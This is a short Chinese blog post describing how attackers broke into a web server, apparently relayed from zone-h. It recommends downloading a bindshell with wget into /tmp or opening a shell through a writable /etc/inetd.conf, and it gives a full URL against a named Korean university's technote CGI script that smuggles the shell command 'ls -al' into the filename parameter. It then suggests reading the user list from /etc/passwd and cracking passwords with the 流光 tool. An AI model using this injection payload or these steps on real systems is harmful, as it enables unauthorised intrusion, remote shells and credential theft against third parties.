来源:http://lams.blogchina.com/
我在zone-h得到了答案,他们是这样干的
用wget把bindshell下载到/tmp/目录下
或者再/etc/inetd.conf可写的情况下直接开一个交互的shell
然后用gcc编译
http://cgiserver.sogang.ac.kr/~gsviscom/cgi-bin/technote/main.cgi/shop.pdf?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|ls%20-al|
ls -al显示文件
||中间的是显示的命令
很简单的办法是得到用户
最基本的办法是得到用户列表然后用流光跑密码
…. etc/passwd?
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论